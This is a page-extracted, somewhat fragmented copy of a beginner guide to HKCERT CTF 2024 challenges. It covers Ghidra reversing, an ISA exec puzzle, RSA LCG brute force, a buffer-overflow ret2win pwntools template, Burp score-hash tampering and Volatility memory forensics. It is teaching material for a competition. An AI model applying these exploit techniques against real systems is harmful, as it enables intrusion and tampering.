HKCERT CTF 2024 - Guide To Beginner-Friendly Challenges (I) - HackMD
HKCERT CTF 2024 - Guide To Beginner-Friendly Challenges (I) - HackMD
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 1/43
11/8/24, 5:56 PM HKCERT CTF 2024: Guide to beginner-friendly challenges (I) - HackMD
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 2/43
11/8/24, 5:56 PM HKCERT CTF 2024: Guide to beginner-friendly challenges (I) - HackMD
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 3/43
11/8/24, 5:56 PM HKCERT CTF 2024: Guide to beginner-friendly challenges (I) - HackMD
Challenge Summary
We are given an attachment with a unknown file:
Solution
We will go over these steps to tackle this challenge:
Identifying the file type (spoiler: its a executable binary)
Run and observe behaviour
Getting your favourite decompiler (Ghidra / IDA) ready
Analyzing the file in Ghidra / IDA
Identifying the file type
First lets download the file into your Ubuntu VM. You can do this with wget command (get
file from web):
wget https://file.ctf.pwnable.hk/babycracker_af9598f78cdeb53f03b2ecd4951fd5a0.zip
To start with, first unzip the file, then use the file command to check the file type.
file babycracker
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 4/43
11/8/24, 5:56 PM HKCERT CTF 2024: Guide to beginner-friendly challenges (I) - HackMD
After starting the executable, it ask you to enter the flag. And after you enter something, it
tell you to "Bye". Very rude program, isn't it?
This is a simple flag checker, that check your flag is valid or not (You can think it similarly
as a software that verify the license code). If you entered a correct flag, it should tell you
the flag was valid / correct.
Imagine, how would you write this kind of program…? Right, in order to check the flag is
correct or not, you need to store some information of the flag in the executable, like:
if user_input == "hkcert24{sample}":
print("Flag verified, valid!")
else:
print("Bye")
…Of course, this example is a bit more complex than this. If this program was written like
the sample above, we can directly look for flag in the file (as the string is included in the
code) as human-readable string, but we can't:
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 5/43
11/8/24, 5:56 PM HKCERT CTF 2024: Guide to beginner-friendly challenges (I) - HackMD
Flag was missing! So the program logic is a bit more complex, and we need some tool to
decompile / disassemble / reverse the executable to help us understand how the program
check for flags.
Getting Ghidra Ready
One of the famous tool for reverse engineering is Ghidra. To install it in your Ubuntu VM,
first install Java:
sudo apt install -y openjdk-21-jdk
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 6/43
11/8/24, 5:56 PM HKCERT CTF 2024: Guide to beginner-friendly challenges (I) - HackMD
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 7/43
11/8/24, 5:56 PM HKCERT CTF 2024: Guide to beginner-friendly challenges (I) - HackMD
Type ./ghidraRun , Enter in the terminal and you should see the Ghidra screen:
Choose Non-Shared Project , and give a nice name for your project:
Drag-and-drop the downloaded babycracker file to the window, and click "OK". You should
see a "Import Results Summary" dialog, click "OK".
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 9/43
11/8/24, 5:56 PM HKCERT CTF 2024: Guide to beginner-friendly challenges (I) - HackMD
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 10/43
11/8/24, 5:56 PM HKCERT CTF 2024: Guide to beginner-friendly challenges (I) - HackMD
1. Assembly view: Shows the binary HEX and disassembled assembly instruction
2. Decompile view: Show the decompiled C code of selected function
3. Symbol Tree: Shows available functions and other symbols in the binary
To start with, lets find the main() function from the Symbol Tree on the left, simply by
clicking each of them one by one:
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 11/43
11/8/24, 5:56 PM HKCERT CTF 2024: Guide to beginner-friendly challenges (I) - HackMD
Does this looks like what we are finding? printf("Enter the flag: ") is what exactly the
program was performing!
Then, we need to figure out how the program decide our input was correct or wrong.
To make the code to be more human-readable, we need to rename the variables (a.k.a.
symbols) to a more sensible name, rather than pbVar1 or local_118 .
Luckily, this program is not very complicated and we are now in AI age, so you can call
your favourite AI to help you with that (I prefer to use claude-3.5-sonnet):
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 12/43
11/8/24, 5:56 PM HKCERT CTF 2024: Guide to beginner-friendly challenges (I) - HackMD
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 13/43
11/8/24, 5:56 PM HKCERT CTF 2024: Guide to beginner-friendly challenges (I) - HackMD
Checking the flag prefix to be hkcert24{ (that is why this string appears in the file)
Check if the flag ends with certain characters
Check if the adding (and multiplying) last few characters would sum up to some
constants
Check if the middle part, after xor with some bytes, would equals to some constant
bytes
We are verified if all these check passes, and the input would be the flag to submit!
Now the complex program become a bunch of simple math questions! You are now very
close to the flag and keep going!
You might be confused whats the size of the "middle part" to be xored during the process.
Notice the if condition at the end which tells you the size, and the rest of the check
constraint the flag length. Keep in mind you can always run through the program in your
VM to check if the flag is correct.
Reverse: ISA 101
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 15/43
11/8/24, 5:56 PM HKCERT CTF 2024: Guide to beginner-friendly challenges (I) - HackMD
In Bauhinia ISA, we have a much simpler flow here for you to get used to assembly
language:
For challenges, you are (only) given the ISA assembly code (via the Download Code button).
For execution, you can use the web interpreter UI to freely execute the program.
You can also copy the ISA code to the playground (https://c58b-ish-2.hkcert24.pwnable.hk?id=1).
There, you can write assembly code, modify existing code (from challenges), set
breakpoints and run the challenge. The playground essentially act as a debugger (as in
gdb ) for you to see the register / stack state. Note the playground have a different
environment so you can never get flags directly there, but you can test things out and see
where do things goes wrong (as you can directly read state at any breakpoint).
For reference to the instruction set used by ISA, please see the full documentation here
(https://hackmd.io/@blackb6a/bauhinia-isa) which contains the detail documentation of every
opcode, syscall and memory mechanism.
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 16/43
11/8/24, 5:56 PM HKCERT CTF 2024: Guide to beginner-friendly challenges (I) - HackMD
Challenge Summary
We are given a link to the challenge server (Note there is two links: one is for the challenge
itself, and the other one is a testing environment for you to play around). You are
presented with the following web page.
As you can see the challenge name is ISA 101 and there is a load button. You can load the
program into the ISA interpreter by clicking on the load button and run. If you try out the
Run button, you will be prompted to input some string. The string would be submitted
when the enter key is pressed and you can see the program terminated with exit code 0.
To see what the program is doing, you can download the source assembly code by clicking
on Download Code .
Walkthrough
We can start by loading the code into the ISA debug playground that is available here
(https://c58b-ish-2.hkcert24.pwnable.hk?id=1).
To start, first click on the Load button, you should be presented with the following
interface. Do note that the environment of the debug playground is different from the
actual challenge server so do expect different output when you run certain syscall such as
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 17/43
11/8/24, 5:56 PM HKCERT CTF 2024: Guide to beginner-friendly challenges (I) - HackMD
exec or listfile .
Left click on the Code View block and you should be able to edit the codes there. Simply
copy and paste the code downloaded from the challenge server and click the Load button
again for the change to take effect.
Lets try to set up a break point at the beginning of the program to debug it step by step.
Simply click to the line number in the code view to set up a breakpoint. Click on the Run
button and the breakpoint should be triggered (i.e. the execution should now be paused
at the breakpoint). Now you could use the Step button or the Continue button to continue
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 18/43
11/8/24, 5:56 PM HKCERT CTF 2024: Guide to beginner-friendly challenges (I) - HackMD
the execution.
The Step button allows the program to execute the next intruction and halts; while the
Continue button allows the program to resume execution until hitting the next breakpoint,
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 19/43
11/8/24, 5:56 PM HKCERT CTF 2024: Guide to beginner-friendly challenges (I) - HackMD
On line 86, there is a syscall that will prompt users to input a string of size 100. We can
confirm this because R8 has value 0 and R2 has value 100 (Note value shown in the
register table is in hex format, so its 0x64 here). We can verify this is true by referring to
the documentation (https://hackmd.io/@blackb6a/bauhinia-isa#Input-Syscall).
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 20/43
11/8/24, 5:56 PM HKCERT CTF 2024: Guide to beginner-friendly challenges (I) - HackMD
Once user has input a string, it would be XORed with the data previously pushed to the
stack. You can verify this behavior by setting a breakpoint on line 96.
In fact, if we extract the code from line 87 to 105, we are able to see the assembly code
there resembles a loop.
87 MOV R2, R8;
88 MOV R3, 0; Set R3 0. R3 appeared to be used as a counter here
89 MOV R4, FP;
90 SUB R4, 256;
91 MOV R5, R4;
92 ADD R5, R3;
93 MOV R6, R1;
94 ADD R6, R3;
95 MOV R7, [R5];
96 XOR [R6], R7; Apply XOR between the user input and the constants. Then store
97 MOV [FP-360], R2;
98 MOV [FP-364], R3;
99 MOV R1, FP;
100 SUB R1, 356;
101 MOV R2, [FP-360];
102 MOV R3, [FP-364];
103 ADD R3, 4; Increament R3 by 4
104 LT R3, 100; Check if R3 is less then 100
105 JNZ -231; Jump back to line 87 if not true
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 21/43
11/8/24, 5:56 PM HKCERT CTF 2024: Guide to beginner-friendly challenges (I) - HackMD
Once the XOR has been applied, the program would check if the first 4 bytes of the result
equals to 29548 on line 111. If you convert 29548 (which is also 0x736c) to string, it is
basically ls . See here
(https://gchq.github.io/CyberChef/#recipe=From_Hex('Auto')Swap_endianness('Raw',4,true)&input=MHg3MzZj&ieol=CR
LF&oeol=FF).
If the comparison equals, then the listfile syscall (documentation
(https://hackmd.io/@blackb6a/bauhinia-isa#Listfile-Syscall)) would be invoked.
After this check, there is an another check on 118. Using similar technique from the
previous code block, can you tell what is this checking for?
116 MOV R4, R1;
117 ADD R4, 0;
118 EQ [R4], 1667594341; Check if equal ????
119 JNZ +9; Jump to line 121 if false
120 JMP +94; Jump to line 127
121 MOV R4, R1;
122 ADD R4, 5;
123 PUSH R4;
124 MOV [FP-360], R2;
125 MOV [FP-364], R3;
126 CALL 0x400014; Jump to line 2
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 22/43
11/8/24, 5:56 PM HKCERT CTF 2024: Guide to beginner-friendly challenges (I) - HackMD
2 PUSH FP;
3 MOV FP, SP;
4 SUB SP, 4;
5 MOV R1, [FP+8]; Set pointer to filename
6 MOV R8, 5;
7 SYSCALL; Syscall exec
8 MOV R2, R1;
9 MOV R1, 0;
10 MOV SP, FP;
11 POP FP;
12 RET;
Solve
After reverse engineering the challenge, we now know the program could list files and
exec file. It is safe to assume that there might be some executable file on the challenge
server which allows printing the flag.
First, we can try to list file on the challenge server to see what file is available up there.
To construct an input string that would satisfy the check, we need to calculate a input
string where it would evaluate to ls after the XOR operation. We can check this easily by
putting a breakpoint on line 111. Let say we input 100 a characters, we can see that R4 is
pointing to fffffe8c with value a952c320 as shown below
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 23/43
11/8/24, 5:56 PM HKCERT CTF 2024: Guide to beginner-friendly challenges (I) - HackMD
By XORing 0x61616161 and 0xa952c320 , we can immediately tell our input aaaa is XORed
with constant 0xc833a241 and we can find this constant on line 80. So to generate an input
that would result in 0x736c , we just need XOR 0x736c and 0xc833a241 , which results in
0xc833d12d . This means that if we provided an hex input (using send in hex ) of 2dd133c8 ,
0x64636261 as stack view assumes all values are in integer. What this mean is if you
affected.
You should be able to see the following information if successful. Find out the full filename
yourself in the challenge environment!
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 24/43
11/8/24, 5:56 PM HKCERT CTF 2024: Guide to beginner-friendly challenges (I) - HackMD
Once you know the filename of the printflag file, you can simply use similar ways as in ls
to invoke exec with the filename of the printflag file as parameter to get the flag.
Crypto: RSA LCG (0)
Challenge Summary
We are given the RSA public key and an encrypted flag encrypted by the key. The
(n, e)
primes for the public modulus are generated by a LCG (linear congruential generator)
n
return p
Why is the seed an odd number of 16 bits? seed = secrets.randbits(16) | 1 is the line
that generates the seed. secrets.randbits(16) returns a non-negative integer with 16
random bits, and | 1 can be considered as "adding one to the number if it is even".
In the attachment, there is a solve script written in Python. However, get_prime(lcg,
bits=1024) is slow, and we are running this four times for every seed. Try to improve the
running time by generating only one prime, and check whether this seed is feasible using
the prime.
It takes around 0.3 seconds on my laptop to generate one prime when given for x0, a, c, b
the LCG. Since there are only 32768 possible seeds in total, it is expected to take 2.6
hours to enumerate all of them.
If you are interested, try to further reduce the require time. You are welcomed to
compile a writeup and share after the CTF ends.
After that, try harder and solve the next three challenges in the RSA LCG series!
Pwn: ChatGGT (1)
Challenge Summary
An attachment with the C source code and Docker environment is provided.
Solution
What should we do to solve a Pwn challenge?
Code review / Code audit
Find the bug(s)
Figure out an attack path
Write script
Get flag!
Code review
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 27/43
11/8/24, 5:56 PM HKCERT CTF 2024: Guide to beginner-friendly challenges (I) - HackMD
void init() {
setvbuf(stdin, 0, 2, 0);
setvbuf(stdout, 0, 2, 0);
setvbuf(stderr, 0, 2, 0);
alarm(60);
}
which does something very common for Pwn challenges, like unbuffering the input/output
and setting a timeout to prevent the program from running for too long. Most of the time,
these init functions are not related to the challenge vulnerabilities.
Then, the main function calls the start_chat function:
#define QUESTION_BUF_SIZE 0x100
void start_chat() {
char question[QUESTION_BUF_SIZE];
while (1){
printf("\nQuestion (Input EXIT to leave the chat): ");
read(0, question, 300);
if (strncmp(question, "EXIT", 4) == 0) break;
printf("I don't understand \"%s\"?\n", question);
}
}
void start_chat() {
char question[QUESTION_BUF_SIZE];
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 28/43
11/8/24, 5:56 PM HKCERT CTF 2024: Guide to beginner-friendly challenges (I) - HackMD
which is more than 256 bytes. If the user input exactly 300 bytes, the first 256 bytes stay
in the buffer question , but the following 34 bytes will overflow and overwrite other data
inside the memory.
Buffer overflow
Under the local variable like question , there is a place storing the "return address", which
tells the program where to run next after it leaves the function.
If we use buffer overflow to overwrite the value of this "return address", we can control the
program where to jump when it leaves the start_chat function.
How many bytes user have to input before it reaches the "return address"? You will
need gdb . Set a breakpoint at the middle of start_chat function, then read the stack
memory layout with x/40gx $rsp .
Where to jump?
Let's go back to the source code, we can find a weird function get_shell which is not used
anywhere:
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 29/43
11/8/24, 5:56 PM HKCERT CTF 2024: Guide to beginner-friendly challenges (I) - HackMD
void get_shell() {
system("/bin/sh");
}
this function will spawn a shell that can let us interact with the operation system, or say,
can let us get the flag.
Therefore, if we control the program to jump into the get_shell function and execute the
codes inside, we're going to get the flag.
What is the address of the get_shell function? It can be checked using gdb or
objdump .
Write a script
# install pwntools
pip install pwntools
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 30/43
11/8/24, 5:56 PM HKCERT CTF 2024: Guide to beginner-friendly challenges (I) - HackMD
Why get_shell function + 5? The reason is a little bit complicated to explain… To put
it simple, calling system in get_shell function somehow requires the value of the stack
register $rsp endwith 0. Jumping to get_shell +5 can fulfill the requirement above
while jumping to get_shell can't.
io.recvuntil("Question (Input EXIT to leave the chat):") # wait until we receive this tex
payload = b"a" * <distance between the buffer `question` and the return address>
payload+= p64(<address of the `get_shell` function + 5>) # craft what we are going to sen
io.send(payload) # send the payload out
io.recvuntil("Question (Input EXIT to leave the chat):") # again... wait until we receive
io.send("EXIT") # Input "EXIT" to leave the loop, and also the `start_chat` function
# program will leave the `start_chat` function, then jump to `get_shell` function
io.interactive() # You can interact with the shell and get a flag now
Prerequsite
Burpsuite (https://portswigger.net/burp/releases/professional-community-2024-8-5?
requestededition=community&requestedplatform=)
Any program to compute SHA256 hash (https://emn178.github.io/online-tools/sha256.html)
Steps
0. You are given a website, the target is to play a game to have score over 300.
1. As there are no player having score over 300. It is not quite possible to perform SQL
injection. (or is it?) Register and login to play the game.
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 31/43
11/8/24, 5:56 PM HKCERT CTF 2024: Guide to beginner-friendly challenges (I) - HackMD
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 32/43
11/8/24, 5:56 PM HKCERT CTF 2024: Guide to beginner-friendly challenges (I) - HackMD
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 33/43
11/8/24, 5:56 PM HKCERT CTF 2024: Guide to beginner-friendly challenges (I) - HackMD
Once the page is opened, go to tab "Proxy" and click "Open Browser".
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 34/43
11/8/24, 5:56 PM HKCERT CTF 2024: Guide to beginner-friendly challenges (I) - HackMD
You will now be able to capture and intercept traffic from build-in Chromium browser.
2. After you finish the game, The score will be updated to database via
/update_score.php . Replay the game and turn on intercept. Intercept /update_score.php
3. Review sourcecode of /game.php (either Ctrl + U, or F12), find out how the hash is
calculated.
The request body is SHA-256 hash of concatinating secretKey , username , and score .
Did you managed to find out secretKey ?
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 35/43
11/8/24, 5:56 PM HKCERT CTF 2024: Guide to beginner-friendly challenges (I) - HackMD
4. Use online SHA-256 calculator to change the hash: secretKey + username + score
e.g. 3636f69fcc3760cb130c1558ffef5e24admin1234301
5. Go back to Burpsuite and change the hash correspondingly. Remember to change the
score and hash in request body.
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 36/43
11/8/24, 5:56 PM HKCERT CTF 2024: Guide to beginner-friendly challenges (I) - HackMD
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 37/43
11/8/24, 5:56 PM HKCERT CTF 2024: Guide to beginner-friendly challenges (I) - HackMD
Prerequsite
1. Installation of volatility 3
On Linux terminal:
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 38/43
11/8/24, 5:56 PM HKCERT CTF 2024: Guide to beginner-friendly challenges (I) - HackMD
cd ~
git clone https://github.com/volatilityfoundation/volatility3.git
cd ./volatility3
mkvirtualenv vol3
workon vol3
pip3 install -r requirements.txt
2. Installation of MemProcFS:
On Linux terminal:
mkdir ~/MemProcFS
cd ~/Downloads
wget https://github.com/ufrisk/MemProcFS/releases/download/v5.12/MemProcFS_files_and_binar
tar -xvzf MemProcFS_files_and_binaries_v5.12.5-linux_x64-20241105.tar.gz -C ~/MemProcFS
sudo apt install make gcc pkg-config libusb-1.0-0 libusb-1.0-0-dev libfuse2 libfuse-dev lz
Steps
cd ~/volatility3
Here is some sample command of volatility3, which may helps for solving the challenge.
https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-
methodology/memory-dump-analysis/volatility-cheatsheet (https://book.hacktricks.xyz/generic-
methodologies-and-resources/basic-forensic-methodology/memory-dump-analysis/volatility-cheatsheet)
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 39/43
11/8/24, 5:56 PM HKCERT CTF 2024: Guide to beginner-friendly challenges (I) - HackMD
It's always suggest to do some quick view of the memory image before attempting the
challenge.
mage/hk_oct_apt_attack.mem windows.filescan.FileScan > ./log/windows.filescan.FileScan.csv
From the output of windows.filescan.FileScan , you may discover a Windows Update bat
file. However, it differs from the way where a normal Windows Update deploy method.
File Extraction
It is possible to extract the file via volatility3. However, it is suggested to use MemProcFS
in this case.
MemProcFS will try to mount the memory image for us to access directly.
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 40/43
11/8/24, 5:56 PM HKCERT CTF 2024: Guide to beginner-friendly challenges (I) - HackMD
cd ~/MemProcFS
mkdir ~/memory
./memprocfs -device ~/volatility3/image/hk_oct_apt_attack.mem -mount ~/memory -forensic 1
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 41/43
11/8/24, 5:56 PM HKCERT CTF 2024: Guide to beginner-friendly challenges (I) - HackMD
Extra notes
In step "File Extraction", we introduced MemProcFS for file extraction. However, it is possible
to use volatilit3 to complete the whole challenge.
In file ./log/windows.pstree.PsTree.csv we discovered that the process powershell.exe is
running with PID 2064. As a result, we can use windows.memmap.Memmap in volatility3 to
extract files of a process.
The windows.memmap.Memmap will extract files in a target output with -o argument.
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 42/43
11/8/24, 5:56 PM HKCERT CTF 2024: Guide to beginner-friendly challenges (I) - HackMD
mkdir ~/volatility3/dump_temp/
python3 vol.py -f ./image/hk_oct_apt_attack.mem -r -o ./dump_temp/ windows.memmap.Memmap -
We also know that powershell uses $ for variable. As a result, we can serach for $ using
grep against output of strings .
https://hackmd.io/@blackb6a/hkcert-ctf-2024-i-en-8381451153faac4a#Forensics-Wheres-the-APT-Attack 43/43